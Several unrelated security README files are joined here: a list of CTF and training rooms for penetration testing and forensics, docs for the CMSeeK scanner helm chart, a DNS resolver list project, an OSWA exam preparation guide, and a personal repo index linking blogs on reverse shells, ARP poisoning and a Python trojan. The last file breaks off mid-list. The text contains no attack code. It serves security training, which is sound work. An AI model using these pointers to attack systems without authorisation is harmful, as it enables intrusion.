Fundamentals](https://tryhackme.com/room/windowsfundamentals1xbx) - Intro to Windows. * [Red Line](https://tryhackme.com/room/btredlinejoxr3d) - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint. ### Free Beginner Blue Team Path / Level 2 - Security Operations, Incident Response & Threat Hunting * [Investigating Windows](https://tryhackme.com/room/investigatingwindows) - Investigating Windows. * [Squid Game](https://tryhackme.com/room/squidgameroom) - Squid game-themed CTF. ### Free Beginner Blue Team Path / Level 3 - Beginner Forensics & Cryptography * [The Glory of the Garden](https://play.picoctf.org/practice/challenge/44?category=4\&page=1\&solved=0) - Beginner image analysis challenge. * [Emo](https://app.hackthebox.com/challenges/emo) - Medium level forensics challenge. * [Obsecure](https://app.hackthebox.com/challenges/obscure) - Medium level forensics challenge. ### Free Beginner Blue Team Path / Level 4 - Memory & Disk Forensics * [Reminiscent](https://app.hackthebox.com/challenges/reminiscent) - Medium level disk forensics challenge. * [Detect Log4J](https://cyberdefenders.org/blueteam-ctf-challenges/86) - Medium level disk forensics challenge. ### Free Beginner Blue Team Path / Level 5 - Malware and Reverse Engineering * [Get PDF (Malicious Document)](https://cyberdefenders.org/blueteam-ctf-challenges/47) - Reversing PDF malware. ### Bonus CTF practice and Latest CVEs / Level 5 - Malware and Reverse Engineering * [Smag Grotto](https://tryhackme.com/room/smaggrotto) - An obsecure boot to root machine. * [Buffer Overflow Prep](https://tryhackme.com/room/bufferoverflowprep) - Practice stack-based buffer overflows. * [Break out the cage](https://tryhackme.com/room/breakoutthecage1) - Help Cage bring back his acting career and investigate the nefarious going on of his agent. * [Lian Yu](https://tryhackme.com/room/lianyu) - A beginner-level security challenge. ### Bonus Windows / Level 5 - Malware and Reverse Engineering * [Retro](https://tryhackme.com/room/retro) - Breaking out of the retro-themed box. * [Anthem](https://tryhackme.com/room/anthem) - Exploit a Windows machine in this beginner-level challenge. ### Extremely Hard Rooms to do / Level 5 - Malware and Reverse Engineering * [Carpe Diem 1](https://tryhackme.com/room/carpediem1) - Recover your client's encrypted files before the ransomware timer runs out. * [EnterPrize](https://tryhackme.com/room/enterprize) - Enterprise-themed network to hack into. ## [May 23, 2022](/content/2022/05/23/README.md) ### Free Beginner Blue Team Path / Level 1 - Tools * [Introduction to digital forensics](https://tryhackme.com/room/introdigitalforensics) - Intro to Digital Forensics. ## [May 22, 2022](/content/2022/05/22/README.md) ### Introduction and Pre-Security / Level 1 - Intro * [Welcome](https://tryhackme.com/jr/welcome) - Learn how to use a TryHackMe room to start your upskilling in cyber security. * [Intro to Researching](https://tryhackme.com/room/introtoresearch) - A brief introduction to research skills for pentesting. * [Linux Fundamentals 1](https://tryhackme.com/room/linuxfundamentalspart1) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 2](https://tryhackme.com/room/linuxfundamentalspart2) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 3](https://tryhackme.com/room/linuxfundamentalspart3) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Pentesting fundamentals](https://tryhackme.com/room/pentestingfundamentals) - Fundamentals of penetration testing. * [Principles of security](https://tryhackme.com/room/principlesofsecurity) - Principles of security. * [Red Team Engagements](https://tryhackme.com/room/redteamengagements) - Intro to red team engagements. * [Google Dorking](https://tryhackme.com/room/googledorking) - Explaining how Search Engines work and leveraging them into finding hidden content! ### Free Beginner Red Team Path / Level 2 - Tooling * [Tmux](https://tryhackme.com/room/rptmux) - Learn to use tmux, one of the most powerful multi-tasking tools on linux. * [Nmap](https://tryhackme.com/room/rpnmap) - Get experience with Nmap, a powerful network scanning tool. * [Web Scanning](https://tryhackme.com/room/rpwebscanning) - Learn the basics of automated web scanning. * [Sublist3r](https://tryhackme.com/room/rpsublist3r) - Learn how to find subdomains with Sublist3r. * [Metasploit](https://tryhackme.com/room/rpmetasploit) - An introduction to the main components of the Metasploit Framework. * [Hydra](https://tryhackme.com/room/hydra) - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials. * [Linux Privesc](https://tryhackme.com/room/linuxprivesc) - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available. * [Red Team Fundamentals](https://tryhackme.com/room/redteamfundamentals) - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements. * [Red Team Recon](https://tryhackme.com/room/redteamrecon) - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. * [Vulnversity](https://tryhackme.com/room/vulnversity) - Learn about active recon, web app attacks and privilege escalation. * [Blue](https://tryhackme.com/room/blue) - Deploy & hack into a Windows machine, leveraging common misconfigurations issues. ### Free Beginner Red Team Path / Level 3 - Crypto & Hashes with CTF practice * [Crack the hash](https://tryhackme.com/room/crackthehash) - Cracking hash challenges. * [Agent Sudo](https://tryhackme.com/room/agentsudoctf) - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth. * [The Cod Caper](https://tryhackme.com/room/thecodcaper) - A guided room taking you through infiltrating and exploiting a Linux system. * [Ice](https://tryhackme.com/room/ice) - Deploy & hack into a Windows machine, exploiting a very poorly secured media server. * [Lazy Admin](https://tryhackme.com/room/lazyadmin) - Easy linux machine to practice your skills. ### Free Beginner Red Team Path / Level 4 - Web * [OWASP top 10](https://tryhackme.com/room/owasptop10) - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. * [Injection](https://tryhackme.com/room/injection) - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. * [Overpass](https://tryhackme.com/room/overpass) - What happens when some broke CompSci students make a password manager. * [Year of the Rabbit](https://tryhackme.com/room/yearoftherabbit) - Can you hack into the Year of the Rabbit box without falling down a hole. * [DevelPy](https://tryhackme.com/room/bsidesgtdevelpy) - Boot2root machine for FIT and bsides Guatemala CTF. ### Free Beginner Red Team Path / Level 5 - Reverse Engineering & Pwn * [Intro to x86 64](https://tryhackme.com/room/introtox8664) - This room teaches the basics of x86-64 assembly language. * [Reverse Engineering](https://tryhackme.com/room/reverseengineering) - This room focuses on teaching the basics of assembly through reverse engineering. * [Reversing ELF](https://tryhackme.com/room/reverselfiles) - Room for beginner Reverse Engineering CTF players. * [Dumping Router Firmware](https://tryhackme.com/room/rfirmware) - Reverse engineering router firmware. * [Intro to pwntools](https://tryhackme.com/room/introtopwntools) - Introduction to popular pwn tools framework. * [Pwnkit: CVE-2021-4034](https://tryhackme.com/room/pwnkit) - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. ### Free Beginner Red Team Path / Level 6 - PrivEsc * [Sudo Security Bypass](https://tryhackme.com/room/sudovulnsbypass) - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series. * [Sudo Buffer Overflow](https://tryhackme.com/room/sudovulnsbof) - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series. * [Windows Privesc Arena](https://tryhackme.com/room/windowsprivescarena) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Linux Privesc Arena](https://tryhackme.com/room/linuxprivescarena) - Students will learn how to escalate privileges using a very vulnerable Linux VM. * [Windows Privesc](https://tryhackme.com/room/windows10privesc) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Kenobi](https://tryhackme.com/room/kenobi) - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. * [Pickle Rick](https://tryhackme.com/room/picklerick) - Rick and Morty themed LFI challenge. ### Free Beginner Blue Team Path / Level 1 - Tools * [Nessus](https://tryhackme.com/room/rpnessusredux) - Intro to nessus scan. * [Mitre](https://tryhackme.com/room/mitre) - Intro to Mitre attack framework. * [Yara](https://tryhackme.com/room/yara) - Intro to yara for malware analysis. * [OpenVAS](https://tryhackme.com/room/openvas) - Intro to openvas. * [Intro to Honeypots](https://tryhackme.com/room/introductiontohoneypots) - Intro to honeypots. * [Volatility](https://tryhackme.com/room/bpvolatility) - Intro to memory analysis with volatility. * [Autopsy](https://tryhackme.com/room/autopsy2ze0) - Use Autopsy to investigate artifacts from a disk image. ### Free Beginner Blue Team Path / Level 2 - Security Operations, Incident Response & Threat Hunting * [Juicy Details](https://tryhackme.com/room/juicydetails) - A popular juice shop has been breached! Analyze the logs to see what had happened. * [Carnage](https://tryhackme.com/room/c2carnage) - Apply your analytical skills to analyze the malicious network traffic using Wireshark. * [Splunk Boss of the SOC V1](https://tryhackme.com/room/bpsplunk) - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information. * [Splunk Boss of the SOC V2](https://cyberdefenders.org/blueteam-ctf-challenges/16) - Splunk analysis vol 2. * [Splunk Boss of the SOC V3](https://cyberdefenders.org/blueteam-ctf-challenges/8) - Splunk analysis vol 3. ### Free Beginner Blue Team Path / Level 3 - Beginner Forensics & Cryptography * [Martryohka doll](https://play.picoctf.org/practice/challenge/129?category=4\&page=1\&solved=0) - Beginner file analysis challenge. * [Packets Primer](https://play.picoctf.org/practice/challenge/286?category=4\&page=2\&solved=0) - Beginner packet analysis challenge. * [Wireshark doo doo doo](https://play.picoctf.org/practice/challenge/115?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [Wireshark two two two](https://play.picoctf.org/practice/challenge/110?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [Trivial flag transfer protocol](https://play.picoctf.org/practice/challenge/103?category=4\&page=1\&solved=0) - Beginner packet analysis challenge. * [What Lies within](https://play.picoctf.org/practice/challenge/74?category=4\&page=2\&solved=0) - Beginner decoding analysis challenge. * [Illumination](https://app.hackthebox.com/challenges/illumination) - Medium level forensics challenge. * [Bucket - Cloud Security Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/84) - Medium level cloud security challenge. * [Introduction to Cryptohack](https://cryptohack.org/courses/intro/course_details/) - Medium level cryptography challenge. ### Free Beginner Blue Team Path / Level 4 - Memory & Disk Forensics * [Sleuthkit Intro](https://play.picoctf.org/practice/challenge/301?category=4\&page=2\&solved=0) - Medium level disk forensics challenge. * [Hunter - Windows Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/32) - Medium level disk forensics challenge. * [Spotlight - Mac Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/34) - Medium level disk forensics challenge. * [Ulysses - Linux Disk Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/41) - Medium level disk forensics challenge. * [Banking Troubles - Windows Memory Image Forensics](https://cyberdefenders.org/blueteam-ctf-challenges/43) - Medium level memory forensics challenge. ### Free Beginner Blue Team Path / Level 5 - Malware and Reverse Engineering * [History of Malware](https://tryhackme.com/room/historyofmalware) - Intro to malware history. * [Malware Introduction](https://tryhackme.com/room/malmalintroductory) - Intro to malware. * [Basic Malware Reverse Engineering](https://tryhackme.com/room/basicmalwarere) - Intro to malware RE. * [Intro Windows Reversing](https://tryhackme.com/room/windowsreversingintro) - Intro to Windows RE. * [Windows x64 Assembly](https://tryhackme.com/room/win64assembly) - Introduction to x64 Assembly on Windows. * [JVM reverse engineering](https://tryhackme.com/room/jvmreverseengineering) - Learn Reverse Engineering for Java Virtual Machine bytecode. ### Bonus CTF practice and Latest CVEs / Level 5 - Malware and Reverse Engineering * [Bandit](https://overthewire.org/wargames/bandit/) - Aimed at absolute beginners and teaches the basics of remote server access. * [Natas](https://overthewire.org/wargames/natas/) - Teaches the basics of serverside web-security. * [Post Exploitation Basics](https://tryhackme.com/room/postexploit) - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. * [Dogcat](https://tryhackme.com/room/dogcat) - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container. * [Insecure Kubernetes](https://tryhackme.com/room/insekube) - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability. * [The Great Escape (docker)](https://tryhackme.com/room/thegreatescape) - Escaping docker container. * [Solr Exploiting Log4j](https://tryhackme.com/room/solar) - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. * [Spring4Shell](https://tryhackme.com/room/spring4shell) - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework. * [Most Recent threats](https://tryhackme.com/module/recent-threats) - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities. ### Bonus Windows / Level 5 - Malware and Reverse Engineering * [Attacktive Directory](https://tryhackme.com/room/attacktivedirectory) - Learn about 99% of Corporate networks that run off of AD. * [Blue Print](https://tryhackme.com/room/blueprint) - Hack into this Windows machine and escalate your privileges to Administrator. * [Relevant](https://tryhackme.com/room/relevant) - Penetration Testing Challenge. ### Extremely Hard Rooms to do / Level 5 - Malware and Reverse Engineering * [Ra](https://tryhackme.com/room/ra) - You have found WindCorp's internal network and their Domain Controller. Pwn the network. * [CCT2019](https://tryhackme.com/room/cct2019) - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet. * [Theseus](https://tryhackme.com/room/theseus) - The first installment of the SuitGuy series of very hard challenges. * [IronCorp](https://tryhackme.com/room/ironcorp) - Get access to Iron Corp's system. * [Borderlands](https://tryhackme.com/room/borderlands) - Compromise a perimeter host and pivot through this network. * [Jeff](https://tryhackme.com/room/jeff) - Hack into Jeff's web server. * [Anonymous Playground](https://tryhackme.com/room/anonymousplayground) - Want to become part of Anonymous? They have a challenge for you. * [Racetrack Bank](https://tryhackme.com/room/racetrackbank) - It's time for another heist. * [Python Playground](https://tryhackme.com/room/pythonplayground) - Use python to pwn this room.
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "v.1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is CMSeeK? CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions. Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities. To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK). ## Deployment The cmseek chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install cmseek secureCodeBox/cmseek ``` ## Scanner Configuration The CMSeeK targets are specified with the `-u` parameter. The target should be a URL. Additional CMSeeK scan features can be configured via the parameter attribute. Some useful example parameters listed below: - `-u URL, --url URL` : Target Url. - `--follow-redirect` : Follows all/any redirect(s). - `--no-redirect` : skips all redirects and tests the input target(s) - `-r, --random-agent`: Use a random user agent. - `--googlebot`: Use Google bot user agent. - `--user-agent USER_AGENT`: Specify a custom user agent ## Requirements Kubernetes: `>=v1.11.0-0` ## Values | Key | Type | Default | Description | |-----|------|---------|-------------| | cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner | | imagePullSecrets | list | `[]` | Define imagePullSecrets when a private registry is used (see: https://kubernetes.io/docs/tasks/configure-pod-container/pull-image-private-registry/) | | parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository | | parser.image.tag | string | defaults to the charts version | Parser image tag | | parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. | | parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) | | scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan | | scanner.image.tag | string | `nil` | defaults to the charts appVersion | | scanner.nameAppend | string | `nil` | append a string to the default scantype name. | | scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated | | scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. | | scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode | | scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system | | scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user | | scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | ## License [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license]. [scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox [scb-docs]: https://www.securecodebox.io/ [scb-site]: https://www.securecodebox.io/ [scb-github]: https://github.com/secureCodeBox/ [scb-twitter]: https://twitter.com/secureCodeBox [scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU [scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
<h1 align="center">Resolvers <a href="https://twitter.com/intent/tweet?text=Trickest%20Resolvers%20-%20The%20most%20exhaustive%20list%20of%20reliable%20DNS%20resolvers%20%40trick3st%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fresolvers&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">The most exhaustive list of reliable DNS resolvers</h3> - [resolvers.txt](resolvers.txt): A simple list of resolver IP addresses, which you can pass directly to your DNS enumeration tool. - [resolvers-extended.txt](resolvers-extended.txt): All of the resolvers in `resolvers.txt` with additional information about each server, including the organization it belongs to, its country, and how many times it has been detected as valid. If a resolver is valid enough times, it may earn its place in the next file. - [resolvers-trusted.txt](resolvers-trusted.txt): A list of trusted resolvers from organizations like Cloudflare, Google, etc. We recommend you use this list to re-validate the results you get with the main resolvers. [<img src="./banner.png" />](https://trickest-access.paperform.co/) ## How it Works A [Trickest](https://trickest.com) workflow creates an initial dataset of resolvers from various sources and then uses multiple instances of [dnsvalidator](https://github.com/vortexau/dnsvalidator) to validate and re-validate this dataset and make it as reliable as possible. ![Trickest Workflow](resolvers.png "Trickest Workflow - Resolvers") ### TB; DZ (Too big; didn't zoom) - We collect the initial dataset from ten sources: - [The Public DNS Server List](https://public-dns.info/nameservers.txt) - A list of provider DNS servers collected from [bass](https://github.com/Abss0x7tbh/bass/tree/master/resolvers) (Thanks, [Abss0x7tbh](https://github.com/Abss0x7tbh)). - [janmasarik/resolvers](https://github.com/janmasarik/resolvers) (Thanks, [janmasarik](https://github.com/janmasarik)). - A list of DNS servers contributed by our community in [resolvers-community.txt](resolvers-community.txt) (Thanks, Trickest community!). - [proabiral/Fresh-Resolvers](https://github.com/proabiral/Fresh-Resolvers) (Thanks, [proabiral](https://github.com/proabiral)). - [geraldino2/jart](https://github.com/geraldino2/jart) (Thanks, [geraldino2](https://github.com/geraldino2)). - [cxosmo/dns-resolvers](https://github.com/cxosmo/dns-resolvers) (Thanks, [cxosmo](https://github.com/cxosmo)). - [Massdns](https://github.com/blechschmidt/massdns)'s resolvers list (Thanks, [blechschmidt](https://github.com/blechschmidt)). - [zeroc00I/test_github_action](https://github.com/zeroc00I/test_github_action) (Thanks, [zeroc00I](https://github.com/zeroc00I)). - [Auto_Wordlists](https://github.com/carlospolop/Auto_Wordlists)'s resolvers list (Thanks, [carlospolop](https://github.com/carlospolop)). - This mega list of resolvers is then `sort -u`d and split up into smaller chunks. - Multiple instances of [dnsvalidator](https://github.com/vortexau/dnsvalidator) are created to validate the resolver lists in parallel (Huge thanks to [vortexau](https://github.com/vortexau) and [codingo](https://github.com/codingo)). - Then we run another round of [dnsvalidator](https://github.com/vortexau/dnsvalidator) to weed out any false positives that survived the previous step. - The final resolvers list is passed to a `whois` script (which uses [APNIC](https://www.apnic.net/)'s API) to find out the organization and country to which each resolver belong. - In the end, the workflow counts the number of times it found each resolver to be valid throughout all the previous runs and writes the frequency data to `resolvers-extended.txt`. - This workflow is scheduled to run constantly. ## Contribution All contributions are welcome! You can create a pull request editing [resolvers-community.txt](resolvers-community.txt) to contribute new DNS servers to the project. For any other suggestions/questions, feel free to create a new ticket via [GitHub issues](https://github.com/trickest/resolvers/issues), tweet at us [@trick3st](https://twitter.com/trick3st), or join the conversation on [Discord](https://discord.gg/7HZmFYTGcQ). ## Build your own workflows! We believe in the value of tinkering. Sign up for a demo on [trickest.com](https://trickest.com) to customize this workflow to your use case, get access to many more workflows, or build your own from scratch! [<img src="./banner.png" />](https://trickest-access.paperform.co/)
# OSWA Experience And Exam Preparation Guide My Offensive Security OSWA certification experience and my personal opinion what helps in preparation for the exam. You think I missed something or have a question? Just reach out by creating an issue or sending me message on [Twitter](https://twitter.com/rnd_infosec_guy) ## About OSWA/Web-200 ### Content The Offensive Security Web Assessor is the certification based on the web-200 course. The goal of the web-200 course is to enable the participant to perform black box web application penetration tests. Therefore, the course covers every relevant topic a pentester needs in these kind of penetration tests. For a more detailed view regarding the content you can view the following resources: - https://www.offensive-security.com/web200-oswa/ - https://www.offensive-security.com/documentation/WEB-200-Syllabus.pdf ### Exam If you already took the OSCP certification of Offensive Security, the exam details probably sound very similar in your ears. The following points are some basic facts about the exam: - 24 hours happy hacking - 24 hours after the hacking part finished you need to have uploaded your pentest report - 5 machines to pwn - every machine has a local.txt and a proof.txt - a total number of 100 points can be achived - you need 70 points and a valid pentest report to pass the exam If you want to know more details feel free to visit the official exam guide: https://help.offensive-security.com/hc/en-us/articles/4410105650964 ## My Preparation and Experience I would consider myself as a pentester with some decent level of experience. But I have to admit that the time frame in this certification probably makes it even for more experienced pentesters not like a walk in the park. So, for me the key to pass the exam were different points: - go completely through the course material (even if you think you already know everything... there might be tips and tricks you did not know) - clear all exercises - clear all challenge labs - watch all videos (repition is the key to learn things) - **make some write up of the course where you write down commands in a copy/paste style, so you can recycle them during your exam (I did this several times)** - if you have a subscription I would highly recommend doing the proving ground boxes provided by Offensive Security to gain speed in solving boxes - speed, speed, speed... you need speed in clearing web application based CTF boxes to get fast enough to clear the exam boxes in the given time (basically you have about 3 to 3.5 hours per box if you at least want to have some sleep during the exam) - parallelize tasks (e.g.: if you are performing some kind of dir busting, manually look at the target website and look for the juicy spots) - be consequent: if you realize you are totally stuck, switch the target and come back later - make screenshots of every part of your exploitation steps in the moment you are successfully exploiting the target (you will need them during the reporting part) ### Proving Grounds and Hack The Box Recommendations It is difficult to recommend specific Proving Grounds boxes to prepare for the exam, as everyone is different. However, here are some boxes I would recommend to solve to get some practice. - FunBoxEasyEnum - Inclusiveness - Potato - Shakabra - Sumo - Hawat - Interface Even if Hack The Box (HTB) machines require privilege escalation and this is out of scope for the OSWA I also would recommend some of the boxes for the exam preparation. - [Pilgrimage](https://www.hackthebox.com/machines/pilgrimage) - [PC](https://www.hackthebox.com/machines/pc) - [Soccer](https://www.hackthebox.com/machines/Soccer) - [Precious](https://www.hackthebox.com/machines/Precious) If you want to have a look at WriteUps a friend of mine and me made together have a look at our [blog](https://ha-l0.github.io/) ### [Syllabus related hints](https://github.com/rndinfosecguy/OSWA-Experience-And-Exam-Preparation/blob/main/syllabus.md)
# networking ## The Code - Try Harder - Progress is not moving forward on the problem. It is learning more. If you are learning ways that don't work, you are progressing and don't qualify to ask/look for hints. - Applications break on bad inputs, not on good ones. Developers forget to consider bad inputs or edge test cases, they are your go-to. ## Profiles [Wechall](https://www.wechall.net/profile/ellessar): Global rank: 3091 / 22851 (Last update: Mar 18, 2021) [HackTheBox](https://www.hackthebox.eu/home/users/profile/362918): 703 (Last Update: May 3, 2021) ## Blogs: [TCP Reverse Shell](https://medium.com/@neelam.nimish/python-tcp-reverse-shell-compromising-a-kali-machine-using-a-mac-6449b8684836) [Router Simulation](https://medium.com/swlh/creating-a-simple-router-simulation-using-python-and-sockets-d6017b441c09) [ARP Poison](https://medium.com/@neelam.nimish/sniffing-a-system-from-outside-a-network-tcp-reverse-shell-arp-poisoning-using-scapy-77a57b545cf6) [HTTP based python trojan for remote code execution](https://medium.com/bugbountywriteup/python-http-based-trojan-for-remote-system-forensics-and-privilege-transfer-ae128891b4de?source=activity---post_recommended_rollup) ## OverTheWire walkthroughs [Bandit](https://overthewire.org/wargames/bandit/) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/over_the_wire_challenges/bandit) [Natas](https://overthewire.org/wargames/natas/) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/over_the_wire_challenges/natas) ## HackTheBox walkthroughs [Traceback](https://www.hackthebox.eu/home/machines/profile/233) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/traceback) [Admirer](https://www.hackthebox.eu/home/machines/profile/248) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/admirer) [Blunder](https://www.hackthebox.eu/home/machines/profile/254) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/blunder) [Time](https://www.hackthebox.eu/home/machines/profile/286) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/time) Have to work on ippsec's approach. [Ready](https://www.hackthebox.eu/home/machines/profile/304) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/ready) [Laboratory](https://app.hackthebox.eu/machines/Laboratory) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/laboratory) [Tenet](https://app.hackthebox.eu/machines/Tenet) - 